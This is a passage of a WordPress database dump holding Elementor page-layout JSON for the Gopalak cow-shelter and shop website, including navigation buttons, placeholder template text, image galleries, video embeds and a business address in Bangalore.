ize\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":6.8070000000000004},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":10.93},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.159000000000001},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.058999999999999},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\",\"id\":1544,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":8.9529999999999994},\"elements\":[],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":91,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9043,1550,'_elementor_page_assets','a:0:{}'),(9054,1552,'_elementor_edit_mode','builder'),(9055,1552,'_elementor_template_type','wp-page'),(9056,1552,'_elementor_version','3.7.8'),(9057,1552,'_wp_page_template','elementor_canvas'),(9058,1552,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":32.792000000000002},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":9.5269999999999992},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":6.8070000000000004},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":10.93},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.159000000000001},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.058999999999999},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\",\"id\":1544,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":8.9529999999999994},\"elements\":[],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":91,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 